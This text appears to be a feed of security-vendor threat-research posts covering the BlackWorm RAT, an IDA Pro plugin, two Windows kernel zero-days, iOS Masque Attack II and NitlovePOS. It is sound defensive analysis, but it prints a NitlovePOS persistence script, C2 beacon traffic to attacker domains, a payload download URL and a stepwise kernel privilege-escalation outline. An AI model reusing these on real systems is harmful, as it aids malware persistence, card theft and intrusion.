Normal view

There are new articles available, click to refresh the page.
Before yesterdayThreat Research

Connecting the Dots: Syrian Malware Team Uses BlackWorm for Attacks

29 August 2014 at 08:00

The Syrian Electronic Army has made news for its recent attacks on major communications websites, Forbes, and an alleged attack on CENTCOM. While these attacks garnered public attention, the activities of another group - The Syrian Malware Team - have gone largely unnoticed. The group’s activities prompted us to take a closer look. We discovered this group using a .NET based RAT called BlackWorm to infiltrate their targets.

The Syrian Malware Team is largely pro-Syrian government, as seen in one of their banners featuring Syrian President Bashar al-Assad. Based on the sentiments publicly expressed by this group it is likely that they are either directly or indirectly involved with the Syrian government. Further certain members of the Syrian Malware Team have ties to the Syrian Electronic army (SEA) known to be linked to the Syrian government. This indicates that the Syrian Malware Team may also be possibly an offshoot or part of the SEA.

syria1

Banner used by the Syrian Malware Team

BlackWorm Authorship

We found at least two distinct versions of the BlackWorm tool, including an original/private version (v0.3.0) and the Dark Edition (v2.1). The original BlackWorm builder was co-authored by Naser Al Mutairi from Kuwait, better known by his online moniker 'njq8'. He is also known to have coded njw0rm, njRAT/LV, and earlier versions of H-worm/Houdini. We found his code being used in a slew of other RATs such as Fallaga and Spygate. BlackWorm v0.3.0 was also co-authored by another actor, Black Mafia.

syria2

About section within the original version of BlackWorm builder

Within the underground development forums, it’s common for threat actors to collaborate on toolsets. Some write the base tools that other attackers can use; others modify and enhance existing tools.

The BlackWorm builder v2.1 is a prime example of actors modifying and enhancing current RATs. After njq8 and Black Mafia created the original builder, another author, Black.Hacker, enhanced its feature set.

syria3

About section within BlackWorm Dark Edition builder

syria4

Black.Hacker's banner on social media

syria5

As an interesting side note, 'njq8' took down his blog in recent months and announced a cease in all malware development activity on his Twitter and Facebook account, urging others to stop as well. This is likely a direct result of the lawsuit filed against him by Microsoft.

BlackWorm RAT Features

The builder for BlackWorm v0.3.0 is fairly simple and allows for very quick payload, but doesn’t allow any configuration other than the IP address for command and control (C2).

syria6

Building binary through BlackWorm v0.3.0

syria7

BlackWorm v0.3.0 controller

BlackWorm v0.3.0 supports the following commands between the controller and the implant:

ping Checks if victim is online
closeserver Exits the implant
restartserver Restarts the implant
sendfile Transfer and run file from server
download Download and run file from URL
ddos Ping flood target
msgbox Message interaction with victim
down Kill critical windows processes
blocker Block specified website by pointing resolution to 127.0.0.1
logoff Logout out of windows
restart Restart system
shutdown Shutdown system
more Disable task manager, registry tools, system restore. Also blocks keyboard and mouse input
hror Displays a startling flash video

In addition to the features supported by the command structure, the payload can:

  • Seek and kill no-ip processes DUC30 and DUC20
  • Disable Task Manager to kill process dialog
  • Copy itself to USB drives and create autorun entries
  • Copy itself to common peer-to-peer (P2P) share locations
  • Collect system information such as OS, username, hostname, presence of camera, active window name, etc., to display in the controller
  • Kill the following analysis processes (if found):
    • procexp
    • SbieCtrl
    • SpyTheSpy
    • SpeedGear
    • Wireshark
    • MBAM
    • ApateDNS
    • IPBlocker
    • cPorts
    • ProcessHacker
    • AntiLogger

The Syrian Malware Team primarily uses another version of BlackWorm called the Dark Edition (v2.1). BlackWorm v2.1 was released on a prolific underground forum where information and code is often shared, traded and sold.

syria8

BlackWorm v2.1 has the same abilities as the original version and additional functionality, including bypassing UAC, disabling host firewalls and spreading over network shares. Unlike its predecessor, it also allows for granular control of the features available within the RAT. These additional controls allow the RAT user to enable and disable features as needed. Binary output can be also be generated in multiple formats, such as .exe, .src and .dll.

syria9

BlackWorm Dark Edition builder

Syrian Malware Team

We observed activity from the Syrian Malware Team going as far back as Jan. 1, 2011. Based on Facebook posts, they are allegedly directly or indirectly involved with the Syrian government. Their Facebook page shows they are still very active, with a post as recent as July 16th, 2014.

syria10

Syrian Malware Team’s Facebook page

The Syrian Malware Team has been involved in everything from profiling targets to orchestrating attacks themselves. There are seemingly multiple members, including:

Partial list of self-proclaimed Syrian Malware Team members

Some of these people have posted malware-related items on Facebook.

syria11

Facebook posting of virus scanning of files

While looking for Dark Edition samples, we discovered a binary named svchost.exe (MD5: 015c51e11e314ff99b1487d92a1ba09b). We quickly saw indicators that it was created by BlackWorm Dark Edition.

syria12

Configuration options within code

The malware communicated out to 178.44.115.196, over port 5050, with a command structure of:

!0/j|n\12121212_64F3BF1F/j|n\{Hostname}/j|n\{Username}/j|n\USA/j|n\Win 7 Professional SP1 x86/j|n\No/j|n\2.4.0 [ Dark Edition]/j|n\/j|n\{ActiveWindowName}/j|n\[endof]

When looking at samples of Dark Edition BlackWorm being used by the Syrian Malware Team, the strings “Syrian Malware,” or “Syrian Malware Team” are often used in the C2 communications or within the binary strings.

Additional pivoting off of svchost.exe brought us to three additional samples apparently built with BlackWorm Dark Edition. E.exe, (MD5: a8cf815c3800202d448d035300985dc7) a binary that drew our attention, looked to be a backdoor with the Syrian Malware strings within it.

syria13

When executed, the binary beacons to aliallosh.sytes.net on port 1177. This C2 has been seen in multiple malware runs often associated with Syria.  The command structure of the binary is:

!0/j|n\Syrian Malware/j|n\{Hostname}/j|n\{Username}/j|n\USA/j|n\Win 7 Professional SP1 x86/j|n\No/j|n

\0.1/j|n\/j|n\{ActiveWindowName}/j|n\[endof]

Finally, pivoting to another sample, 1gpj.srcRania (MD5:f99c15c62a5d981ffac5fdb611e13095), the same strings were present. The string "Rania" used as a lure was in Arabic and likely refers to the prolific Queen Rania of Jordan.

syria14

The traffic is nearly identical to the other samples we identified and tied to the Syrian Malware Team.

!1/j|n\C:\Documents and Settings\{Username}\Local Settings\Application DataldoDrZdpkK.jpg - Windows Internet Explorer[endof]!0/j|n\Syrian Malware/j|n\{Hostname}/j|n\{Username}/j|n\USA/j|n\Win XP ProfessionalSP2 x86/j|n\No/j|n\0.1/j|n\/j|n\C:\Documents and Settings\{Username}\Local Settings\Application DataldoDrZdpkK.jpg - {ActiveWindowName}/j|n\[endof]

Conclusion

Determining which groups use which malware is often very difficult. Connecting the dots between actors and malware typically involves looking at binary code, identifying related malware examples associated with those binaries, and reviewing infection vectors, among other things.

This blog presents a prime example of the process of attribution. We connected a builder with malware samples and the actors/developers behind these attacks. This type of attribution is key to creating actionable threat intelligence to help proactively protect organizations.

FLARE IDA Pro Script Series: MSDN Annotations Plugin for Malware Analysis

11 September 2014 at 22:00

The FireEye Labs Advanced Reverse Engineering (FLARE) Team continues to share knowledge and tools with the community. We started this blog series with a script for Automatic Recovery of Constructed Strings in Malware. As always, you can download these scripts at the following location: https://github.com/fireeye/flare-ida. We hope you find all these scripts as useful as we do.

 

Motivation

 

During my summer internship with the FLARE team, my goal was to develop IDAPython plug-ins that speed up the reverse engineering workflow in IDA Pro. While analyzing malware samples with the team, I realized that a lot of time is spent looking up information about functions, arguments, and constants at the Microsoft Developer Network (MSDN) website. Frequently switching to the developer documentation can interrupt the reverse engineering process, so we thought about ways to integrate MSDN information into IDA Pro automatically. In this blog post we will release a script that does just that, and we will show you how to use it.

 

Introduction

 

The MSDN Annotations plug-in integrates information about functions, arguments and return values into IDA Pro’s disassembly listing in the form of IDA comments. This allows the information to be integrated as seamlessly as possible. Additionally, the plug-in is able to automatically rename constants, which further speeds up the analyst workflow. The plug-in relies on an offline XML database file, which is generated from Microsoft’s documentation and IDA type library files.

 

Features

 

Table 1 shows what benefit the plug-in provides to an analyst. On the left you can see IDA Pro’s standard disassembly: seven arguments get pushed onto the stack and then the CreateFileA function is called. Normally an analyst would have to look up function, argument and possibly constant descriptions in the documentation to understand what this code snippet is trying to accomplish. To obtain readable constant values, an analyst would be required to research the respective argument, import the corresponding standard enumeration into IDA and then manually rename each value. The right side of Table 1 shows the result of executing our plug-in showing the support it offers to an analyst.

The most obvious change is that constants are renamed automatically. In this example, 40000000h was automatically converted to GENERIC_WRITE. Additionally, each function argument is renamed to a unique name, so the corresponding description can be added to the disassembly.

flare1

Table 1: Automatic labelling of standard symbolic constants

In Figure 1 you can see how the plug-in enables you to display function, argument, and constant information right within the disassembly. The top image shows how hovering over the CreateFileA function displays a short description and the return value. In the middle image, hovering over the hTemplateFile argument displays the corresponding description. And in the bottom image, you can see how hovering over dwShareMode, the automatically renamed constant displays descriptive information.

Functions

flare2

Arguments

flare3

Constants

flare4

Figure 1: Hovering function names, arguments and constants displays the respective descriptions

 

How it works

 

Before the plug-in makes any changes to the disassembly, it creates a backup of the current IDA database file (IDB). This file gets stored in the same directory as the current database and can be used to revert to the previous markup in case you do not like the changes or something goes wrong.

The plug-in is designed to run once on a sample before you start your analysis. It relies on an offline database generated from the MSDN documentation and IDA Pro type library (TIL) files. For every function reference in the import table, the plug-in annotates the function’s description and return value, adds argument descriptions, and renames constants. An example of an annotated import table is depicted in Figure 2. It shows how a descriptive comment is added to each API function call. In order to identify addresses of instructions that position arguments prior to a function call, the plug-in relies on IDA Pro’s markup.

flare5

Figure 2: Annotated import table

Figure 3 shows the additional .msdn segment the plug-in creates in order to store argument descriptions. This only impacts the IDA database file and does not modify the original binary.

flare6

Figure 3: The additional segment added to the IDA database

The .msdn segment stores the argument descriptions as shown in Figure 4. The unique argument names and their descriptive comments are sequentially added to the segment.

flare7

Figure 4: Names and comments inserted for argument descriptions

To allow the user to see constant descriptions by hovering over constants in the disassembly, the plug-in imports IDA Pro’s relevant standard enumeration and adds descriptive comments to the enumeration members. Figure 5 shows this for the MACRO_CREATE enumeration, which stores constants passed as dwCreationDisposition to CreateFileA.

flare8

Figure 5: Descriptions added to the constant enumeration members

 

Preparing the MSDN database file

 

The plug-in’s graphical interface requires you to have the QT framework and Python scripting installed. This is included with the IDA Pro 6.6 release. You can also set it up for IDA 6.5 as described here (http://www.hexblog.com/?p=333).

As mentioned earlier, the plug-in requires an XML database file storing the MSDN documentation. We cannot distribute the database file with the plug-in because Microsoft holds the copyright for it. However, we provide a script to generate the database file. It can be cloned from the git repository at https://github.com/fireeye/flare-ida together with the annotation plug-in.

You can take the following steps to setup the database file. You only have to do this once.

 

     

  1. Download and install an offline version of the MSDN documentationYou can download the Microsoft Windows SDK MSDN documentation. The standalone installer can be downloaded from http://www.microsoft.com/en-us/download/details.aspx?id=18950. Although it is not the newest SDK version, it includes all the needed information and data extraction is straight-forward.As shown in Figure 6, you can select to only install the help files. By default they are located in C:\Program Files\Microsoft SDKs\Windows\v7.0\Help\1033.

     

    flare9

    Figure 6: Installing a local copy of the MSDN documentation

     

  2. Extract the files with an archive manager like 7-zip to a directory of your choice.
  3. Download and extract tilib.exe from Hex-Ray’s download page at https://www.hex-rays.com/products/ida/support/download.shtml 

     

    To allow the plug-in to rename constants, it needs to know which enumerations to import. IDA Pro stores this information in TIL files located in %IDADIR%/til/. Hex-Rays provides a tool (tilib) to show TIL file contents via their download page for registered users. Download the tilib archive and extract the binary into %IDADIR%. If you run tilib without any arguments and it displays its help message, the program is running correctly.

  4. Run MSDN_crawler/msdn_crawler.py <path to extracted MSDN documentation> <path to tilib.exe> <path to til files>

     

     

    With these prerequisites fulfilled, you can run the MSDN_crawler.py script, located in the MSDN_crawler directory. It expects the path to the TIL files you want to extract (normally %IDADIR%/til/pc/) and the path to the extracted MSDN documentation. After the script finishes execution the final XML database file should be located in the MSDN_data directory.

  5.  

 

You can now run our plug-in to annotate your disassembly in IDA.

Running the MSDN annotations plug-in

In IDA, use File - Script file... (ALT + F7) to open the script named annotate_IDB_MSDN.py. This will display the dialog box shown in Figure 7 that allows you to configure the modifications the plug-in performs. By default, the plug-in annotates functions, arguments and rename constants. If you change the settings and execute the plug-in by clicking OK, your settings get stored in a configuration file in the plug-in’s directory. This allows you to quickly run the plug-in on other samples using your preferred settings. If you do not choose to annotate functions and/or arguments, you will not be able to see the respective descriptions by hovering over the element.

flare10

Figure 7: The plug-in’s configuration window showing the default settings

When you choose to use repeatable comments for function name annotations, the description is visible in the disassembly listing, as shown in Figure 8.

flare11

Figure 8: The plug-in’s preview of function annotations with repeatable comments

 

Similar Tools and Known Limitations

 

Parts of our solution were inspired by existing IDA Pro plug-ins, such as IDAScope and IDAAPIHelp. A special thank you goes out to Zynamics for their MSDN crawler and the IDA importer which greatly supported our development.

Our plug-in has mainly been tested on IDA Pro for Windows, though it should work on all platforms. Due to the structure of the MSDN documentation and limitations of the MSDN crawler, not all constants can be parsed automatically. When you encounter missing information you can extend the annotation database by placing files with supplemental information into the MSDN_data directory. In order to be processed correctly, they have to be valid XML following the schema given in the main database file (msdn_data.xml). However, if you want to extend partly existing function information, you only have to add the additional fields. Name tags are mandatory for this, as they get used to identify the respective element.

For example, if the parser did not recognize a commonly used constant, we could add the information manually. For the CreateFileA function’s dwDesiredAccess argument the additional information could look similar to Listing 1.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

<?xml version="1.0" encoding="ISO-8859-1"?>

<msdn>

<functions>

<function>

<name>CreateFileA</name>

<arguments>

<argument>

<name>dwDesiredAccess</name>

<constants enums="MACRO_GENERIC">

<constant>

<name>GENERIC_ALL</name>

<value>0x10000000</value>

<description>All possible access rights</description>

</constant>

<constant>

<name>GENERIC_EXECUTE</name>

<value>0x20000000</value>

<description>Execute access</description>

</constant>

<constant>

<name>GENERIC_WRITE</name>

<value>0x40000000</value>

<description>Write access</description>

</constant>

<constant>

<name>GENERIC_READ</name>

<value>0x80000000</value>

<description>Read access</description>

</constant>

</constants>

</argument>

</arguments>

</function>

</functions>

</msdn>

 

 

Listing 1: Additional information enhancing the dwDesiredAccess argument for the CreateFileA function

 

Conclusion

 

In this post, we showed how you can generate a MSDN database file used by our plug-in to automatically annotate information about functions, arguments and constants into IDA Pro’s disassembly. Furthermore, we talked about how the plug-in works, and how you can configure and customize it. We hope this speeds up your analysis process!

Stay tuned for the FLARE Team’s next post where we will release solutions for the FLARE On Challenge (www.flare-on.com).

 

Two Limited, Targeted Attacks; Two New Zero-Days

14 October 2014 at 14:46

The FireEye Labs team has identified two new zero-day vulnerabilities as part of limited, targeted attacks against some major corporations. Both zero-days exploit the Windows Kernel, with Microsoft assigning CVE-2014-4148 and CVE-2014-4113 to and addressing the vulnerabilities in their October 2014 Security Bulletin.

FireEye Labs have identified 16 total zero-day attacks in the last two years – uncovering 11 in 2013 and five in 2014 so far.

Microsoft commented: “On October 14, 2014, Microsoft released MS14-058 to fully address these vulnerabilities and help protect customers. We appreciate FireEye Labs using Coordinated Vulnerability Disclosure to assist us in working toward a fix in a collaborative manner that helps keep customers safe.”

In the case of CVE-2014-4148, the attackers exploited a vulnerability in the Microsoft Windows TrueType Font (TTF) processing subsystem, using a Microsoft Office document to embed and deliver a malicious TTF to an international organization. Since the embedded TTF is processed in kernel-mode, successful exploitation granted the attackers kernel-mode access. Though the TTF is delivered in a Microsoft Office document, the vulnerability does not reside within Microsoft Office.

CVE-2014-4148 impacted both 32-bit and 64-bit Windows operating systems shown in MS14-058, though the attacks only targeted 32-bit systems. The malware contained within the exploit has specific functions adapted to the following operating system platform categories:

  • Windows 8.1/Windows Server 2012 R2
  • Windows 8/Windows Server 2012
  • Windows 7/Windows Server 2008 R2 (Service Pack 0 and 1)
  • Windows XP Service Pack 3

CVE-2014-4113 rendered Microsoft Windows 7, Vista, XP, Windows 2000, Windows Server 2003/R2, and Windows Server 2008/R2 vulnerable to a local Elevation of Privilege (EoP) attack. This means that the vulnerability cannot be used on its own to compromise a customer’s security. An attacker would first need to gain access to a remote system running any of the above operating systems before they could execute code within the context of the Windows Kernel. Investigation by FireEye Labs has revealed evidence that attackers have likely used variations of these exploits for a while. Windows 8 and Windows Server 2012 and later do not have these same vulnerabilities.

Information on the companies affected, as well as threat actors, is not available at this time. We have no evidence of these exploits being used by the same actors. Instead, we have only observed each exploit being used separately, in unrelated attacks.

 

About CVE-2014-4148

 

 

Mitigation

 

Microsoft has released security update MS14-058 that addresses CVE-2014-4148.

Since TTF exploits target the underlying operating system, the vulnerability can be exploited through multiple attack vectors, including web pages. In the past, exploit kit authors have converted a similar exploit (CVE-2011-3402) for use in browser-based attacks. More information about this scenario is available under Microsoft’s response to CVE-2011-3402: MS11-087.

 

Details

 

This TTF exploit is packaged within a Microsoft Office file. Upon opening the file, the font will exploit a vulnerability in the Windows TTF subsystem located within the win32k.sys kernel-mode driver.

The attacker’s shellcode resides within the Font Program (fpgm) section of the TTF. The font program begins with a short sequence of instructions that quickly return. The remainder of the font program section is treated as unreachable code for the purposes of the font program and is ignored when initially parsing the font.

During exploitation, the attacker’s shellcode uses Asynchronous Procedure Calls (APC) to inject the second stage from kernel-mode into the user-mode process winlogon.exe (in XP) or lsass.exe (in other OSes). From the injected process, the attacker writes and executes a third stage (executable).

The third stage decodes an embedded DLL to, and runs it from, memory. This DLL is a full-featured remote access tool that connects back to the attacker.

Plenty of evidence supports the attacker’s high level of sophistication. Beyond the fact that the attack is zero-day kernel-level exploit, the attack also showed the following:

  • a usable hard-coded area of kernel memory is used like a mutex to avoid running the shellcode multiple times
  • the exploit has an expiration date: if the current time is after October 31, 2014, the exploit shellcode will exit silently
  • the shellcode has implementation customizations for four different types of OS platforms/service pack levels, suggesting that testing for multiple OS platforms was conducted
  • the dropped malware individually decodes each string when that string is used to prevent analysis
  • the dropped malware is specifically customized for the targeted environment
  • the dropped remote access capability is full-featured and customized: it does not rely on generally available implementations (like Poison Ivy)
  • the dropped remote access capability is a loader that decrypts the actual DLL remote access capability into memory and never writes the decrypted remote access capability to disk

 

About CVE-2014-4113

 

 

Mitigation

 

Microsoft has released security update MS14-058 that addresses this vulnerability.

 

Vulnerability and Exploit Details

 

The 32-bit exploit triggers an out-of-bounds memory access that dereferences offsets from a high memory address, and inadvertently wraps into the null page. In user-mode, memory dereferences within the null page are generally assumed to be non-exploitable. Since the null page is usually not mapped – the exception being 16-bit legacy applications emulated by ntvdm.exe--null pointer dereferences will simply crash the running process. In contrast, memory dereferences within the null page in the kernel are commonly exploited because the attacker can first map the null page from user-mode, as is the case with this exploits. The steps taken for successful 32-bit exploitation are:

 

     

  1. Map the null page:

     

     

       

    1. ntdll!ZwAllocateVirtualMemory(…,BaseAddress=0x1, …)
    2.  

     

     

  2. Build a malformed win32k!tagWND structure at the null page such that it is properly validated in the kernel
  3. Trigger vulnerability
  4. Attacker’s callback in win32k!tagWND.lpfnWndProc executes in kernel-mode

     

     

       

    1. Callback overwrites EPROCESS.Token to elevate privileges
    2.  

     

     

  5. Spawns a child process that inherits the elevated access token
  6.  

 

32-bit Windows 8 and later users are not affected by this exploit. The Windows 8 Null Page protection prohibits user-mode processes from mapping the null page and causes the exploits to fail.

In the 64-bit version of the exploit, dereferencing offsets from a high 32-bit memory address do not wrap, as it is well within the addressable memory range for a 64-bit user-mode process. As such, the Null Page protection implemented in Windows versions 7 (after MS13-031) and later does not apply. The steps taken by the 64-bit exploit variants are:

 

     

  1. Map memory page:

     

     

       

    1. ntdll!ZwAllocateVirtualMemory(…)
    2.  

     

     

  2. Build a malformed win32k!tagWND structure at the mapped page such that it is properly validated in the kernel
  3. Trigger vulnerability
  4. Attacker’s callback in win32k!tagWND.lpfnWndProc executes in kernel-mode

     

     

       

    1. Callback overwrites EPROCESS.Token to elevate privileges
    2.  

     

     

  5. Spawns a child process that inherits the elevated access token
  6.  

 

64-bit Windows 8 and later users are not affected by this exploit. Supervisor Mode Execution Prevention (SMEP) blocks the attacker’s user-mode callback from executing within kernel-mode and causes the exploits to fail.

 

Exploits Tool History

 

The exploits are implemented as a command line tool that accepts a single command line argument – a shell command to execute with SYSTEM privileges. This tool appears to be an updated version of an earlier tool. The earlier tool exploited CVE-2011-1249, and displays the following usage message to stdout when run:

 

Usage:system_exp.exe cmd

 

 

Windows Kernel Local Privilege Exploits

 

The vast majority of samples of the earlier tool have compile dates in December 2009.  Only two samples were discovered with compile dates in March 2011. Although the two samples exploit the same CVE, they carry a slightly modified usage message of:

 

Usage:local.exe cmd

 

 

Windows local Exploits

 

The most recent version of the tool, which implements CVE-2014-4113, eliminates all usage messages.

The tool appears to have gone through at least three iterations over time. The initial tool and exploits is believed to have had limited availability, and may have been employed by a handful of distinct attack groups. As the exploited vulnerability was remediated, someone with access to the tool modified it to use a newer exploit when one became available. These two newer versions likely did not achieve the widespread distribution that the original tool/exploits did and may have been retained privately, not necessarily even by the same actors.

We would like to thank Barry Vengerik, Joshua Homan, Steve Davis, Ned Moran, Corbin Souffrant, Xiaobo Chen for their assistance on this research.

iOS Masque Attack Revived: Bypassing Prompt for Trust and App URL Scheme Hijacking

By: Hui Xue
19 February 2015 at 19:00

In November of last year, we uncovered a major flaw in iOS we dubbed “Masque Attack” that allowed for malicious apps to replace existing, legitimate ones on an iOS device via SMS, email, or web browsing. In total, we have notified Apple of five security issues related to four kinds of Masque Attacks. Today, we are sharing Masque Attack II in the series – part of which has been fixed in the recent iOS 8.1.3 security content update [2].

Masque Attack II includes bypassing iOS prompt for trust and iOS URL scheme hijacking. iOS 8.1.3 fixed the first part whereas the iOS URL scheme hijacking is still present.

iOS app URL scheme “lets you communicate with other apps through a protocol that you define.” [1] By deliberately defining the same URL schemes used by other apps, a malicious app can still hijack the communications towards those apps and mount phishing attacks to steal login credentials. Even worse than the first Masque Attack [3], attackers might be able to conduct Masque Attack II through an app in the App Store. We describe these two parts of Masque Attack II in the following sections.

Bypassing Prompt for Trust

When the user clicks to open an enterprise-signed app for the first time, iOS asks whether the user trusts the signing party. The app won’t launch unless the user chooses “Trust”.  Apple suggested defending against Masque Attack by the aid of this “Don’t Trust” prompt [8]. We notified Apple that this was inadequate.

We find that when calling an iOS URL scheme, iOS launches the enterprise-signed app registered to handle the URL scheme without prompting for trust. It doesn’t matter whether the user has launched that enterprise-signed app before. Even if the user has always clicked “Don’t Trust”, iOS still launches that enterprise-signed app directly upon calling its URL scheme. In other words, when the user clicks on a link in SMS, iOS Mail or Google Inbox, iOS launches the target enterprise-signed app without asking for user’s “Trust” or even ignores user’s “Don’t Trust”. An attacker can leverage this issue to launch an app containing a Masque Attack.

By crafting and distributing an enterprise-signed malware that registers app URL schemes identical to the ones used by legitimate popular apps, an attacker may hijack legitimate apps’ URL schemes and mimic their UI to carry out phishing attacks, e.g. stealing the login credentials. iOS doesn’t protect users from this attack because it doesn’t prompt for trust to the user when launching such an enterprise-signed malware for the first time through app URL scheme. In Demo Video 1, we explain this issue with concrete examples.

We’ve also found other approaches to bypass “Don’t Trust” protection through iOS springboard. We confirmed these problems on iOS 7.1.2, 8.1.1, 8.1.2 and 8.2 beta. Recently Apple fixed these issues and acknowledged our findings in CVE-2014-4494 in the iOS 8.1.3 security content [2]. As measured by the App Store on 2 Feb 2015 [4], however, 28% devices use iOS version 7 or lower, which are still vulnerable. Of the 72% iOS 8 devices, some are also vulnerable given that iOS 8.1.3 came out in late January 2015. We encourage users to upgrade their iOS devices to the latest version as soon as possible.

NitlovePOS: Another New POS Malware

23 May 2015 at 18:05

There has been a proliferation of malware specifically designed to extract payment card information from Point-of-Sale (POS) systems over the last two years. In 2015, there have already been a variety of new POS malware identified including a new Alina variant, FighterPOS and Punkey. During our research into a widespread spam campaign, we discovered yet another POS malware that we’ve named NitlovePOS.

The NitlovePOS malware can capture and ex-filtrate track one and track two payment card data by scanning the running processes of a compromised machine. It then sends this data to a webserver using SSL.

We believe the cybercriminals assess the hosts compromised via indiscriminate spam campaigns and instruct specific victims to download the POS malware.

Propagation

We have been monitoring an indiscriminate spam campaign that started on Wednesday, May 20, 2015.  The spam emails referred to possible employment opportunities and purported to have a resume attached. The “From” email addresses were spoofed Yahoo! Mail accounts and contained the following “Subject” lines:

    Subject: Any Jobs?

    Subject: Any openings?

    Subject: Internship

    Subject: Internship questions

    Subject: Internships?

    Subject: Job Posting

    Subject: Job questions

    Subject: My Resume

    Subject: Openings?

The email came with an attachment named CV_[4 numbers].doc or My_Resume_[4 numbers].doc, which is embedded with a malicious macro. To trick the recipient into enabling the malicious macro, the document claims to be a “protected document.”

If enabled, the malicious macro will download and execute a malicious executable from 80.242.123.155/exe/dro.exe. The cybercriminals behind this operation have been updating the payload. So far, we have observed:

    e6531d4c246ecf82a2fd959003d76cca  dro.exe

    600e5df303765ff73dccff1c3e37c03a  dro.exe

These payloads beacon to the same server from which they are downloaded and receive instructions to download additional malware hosted on this server. This server contains a wide variety of malware:

    6545d2528460884b24bf6d53b721bf9e  5dro.exe

    e339fce54e2ff6e9bd3a5c9fe6a214ea  AndroSpread.exe

    9e208e9d516f27fd95e8d165bd7911e8  AndroSpread.exe

    abc69e0d444536e41016754cfee3ff90  dr2o.exe

    e6531d4c246ecf82a2fd959003d76cca  dro.exe

    600e5df303765ff73dccff1c3e37c03a  dro.exe

    c8b0769eb21bb103b8fbda8ddaea2806  jews2.exe

    4d877072fd81b5b18c2c585f5a58a56e  load33.exe

    9c6398de0101e6b3811cf35de6fc7b79  load.exe

    ac8358ce51bbc7f7515e656316e23f8d  Pony.exe

    3309274e139157762b5708998d00cee0  Pony.exe

    b3962f61a4819593233aa5893421c4d1  pos.exe

    6cdd93dcb1c54a4e2b036d2e13b51216  pos.exe

We focused on the “pos.exe” malware and suspected that it maybe targeted Point of Sale machines. We speculate that once the attackers have identified a potentially interesting host form among their victims, they can then instruct the victim to download the POS malware. While we have observed many downloads of the various EXE’s hosed on that server, we have only observed three downloads of “pos.exe”.

Technical Analysis

We analyzed the “pos.exe” (6cdd93dcb1c54a4e2b036d2e13b51216) binary found on the 80.242.123.155 server. (A new version of “pos.exe” (b3962f61a4819593233aa5893421c4d1) was uploaded on May 22, 2015 that has exactly the same malicious behavior but with different file structure.)

The binary itself is named “TAPIBrowser” and was created on May 20, 2015.

    File Name                       : pos.exe

    File Size                       : 141 kB

    MD5: 6cdd93dcb1c54a4e2b036d2e13b51216

    File Type                       : Win32 EXE

    Machine Type                    : Intel 386 or later, and compatibles

    Time Stamp                      : 2015:05:20 09:02:54-07:00

    PE Type                         : PE32

    File Description                : TAPIBrowser MFC Application

    File Version                    : 1, 0, 0, 1

    Internal Name                   : TAPIBrowser

    Legal Copyright                 : Copyright (C) 2000

    Legal Trademarks                :

    Original Filename               : TAPIBrowser.EXE

    Private Build                   :

    Product Name                    : TAPIBrowser Application

    Product Version                 : 1, 0, 0, 1:

The structure of the file is awkward; it only contains three sections: .rdata, .hidata and .rsrc and the entry point located inside .hidata:

When executed, it will copy itself to disk using a well-known hiding technique via NTFS Alternate Data Streams (ADS) as:

    ~\Local Settings\Temp:defrag.scr

Then will create a vbs script and save it to disk, again using ADS:

    ~\Local Settings\Temp:defrag.vbs

By doing this, the files are not visible in the file system and therefore are more difficult to locate and detect.

Once the malware is running, the “defrag.vbs” script monitors for attempts to delete the malicious process via InstanceDeletion Event; it will re-spawn the malware if the process is terminated. Here is the code contained within “defrag.vbs”:

Set f=CreateObject("Scripting.FileSystemObject")

Set W=CreateObject("WScript.Shell")

Do While                      

GetObject("winmgmts:Win32_Process").Create(W.ExpandEnvironmentStrings("""%TMP%:Defrag.scr""     -"),n,n,p)=0

GetObject("winmgmts:\\.\root\cimv2").ExecNotificationQuery("Select * From __InstanceDeletionEvent Within 1 Where TargetInstance ISA 'Win32_Process' AND TargetInstance.ProcessID="&p).NextEvent

if(f.FileExists(WScript.ScriptFullName)=false)then

W.Run(W.ExpandEnvironmentStrings("cmd /C /D type nul > %TMP%:Defrag.scr")), 0, true

Exit Do

End If

Loop

The malware ensures that it will run after every reboot by adding itself to the Run registry key:

    \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\"Defrag" = wscript "C:\Users\ADMINI~1\AppData\Local\Temp:defrag.vbs"

NitlovePOS expects to be run with the “-“ sign as argument; otherwise it won’t perform any malicious actions. This technique can help bypass some methods of detection, particularly those that leverage automation. Here is an example of how the malware is executed:

    \LOCALS~1\Temp:Defrag.scr" -

If the right argument is provided, NitlovePOS will decode itself in memory and start searching for payment card data. If it is not successful, NitlovePOS will sleep for five minutes and restart the searching effort.

NitlovePOS has three main threads:

    Thread 1:  SSL C2 Communications

    Thread 2: MailSlot monitoring waiting for CC.

    Thread 3: Memory Scrapping

Thread 1:  C2 Communications

NitlovePOS is configured to connect to one of three hardcoded C2 servers:

    systeminfou48[.]ru

    infofinaciale8h[.]ru

    helpdesk7r[.]ru

All three of these domains resolve to the same IP address: 146.185.221.31. This IP address is assigned to a network located in St. Petersburg, Russia.

As soon as NitlovePOS starts running on the compromised system, it will initiate a callback via SSL:

    POST /derpos/gateway.php HTTP/1.1

    User-Agent: nit_love<GUID>

    Host: systeminfou48.ru

    Content-Length: 41

    Connection: Keep-Alive

    Cache-Control: no-cache

    Pragma: no-cache

 

    F.r.HWAWAWAWA

    <computer name>

    <OS Version>

    Y

The User-Agent header contains a hardcoded string “nit_love” and the Machine GUID, which is not necessarily unique but can be used as an identifier by the cybercriminals. The string “HWAWAWAWA” is hardcoded and may be a unique campaign identifier; the “F.r.” is calculated per infected host.

Thread 2: MailSlot monitoring waiting for payment card data

A mailslot is basically a shared range of memory that can be used to store data; the process creating the mailslot acts as the server and the clients can be other hosts on the same network, local processes on the machine, or local threads in the same process.

NitlovePOS uses this feature to store payment card information; the mailslot name that is created comes as a hardcoded string in the binary (once de-obfuscated);

    "\\.\mailslot\95d292040d8c4e31ac54a93ace198142"

Once the mailslot is created, an infinite loop will keep querying the allocated space.

Thread 3: Memory Scrapping

NitlovePOS scans running processes for payment data and but will skip System and “System Idle Process.” It will try to match track 1 or track 2 data and, if found, will write the data into the mailslot created by Thread 2. This information is then sent via POST it to the C2 using SSL, which makes network-level detection more difficult.

Possible Control Panel

During our research we observed what appears to be a test control panel on a different, but probably related, server that matches with NitlovePOS. This panel is called “nitbot,” which is similar to the “nit_love” string found in the binary and was located in a directory called “derpmo” which is similar to the “derpos” used in this case.

 

The information contained in the NitlovePOS beacon matches the fields that are displayed in the Nitbot control panel. These include the machines GIUD that is transmitted in the User-Agent header as well as an identifier “HWAWAWAWA,” which aligns with the “group name” that can be used by the cybercriminals to track various campaigns.

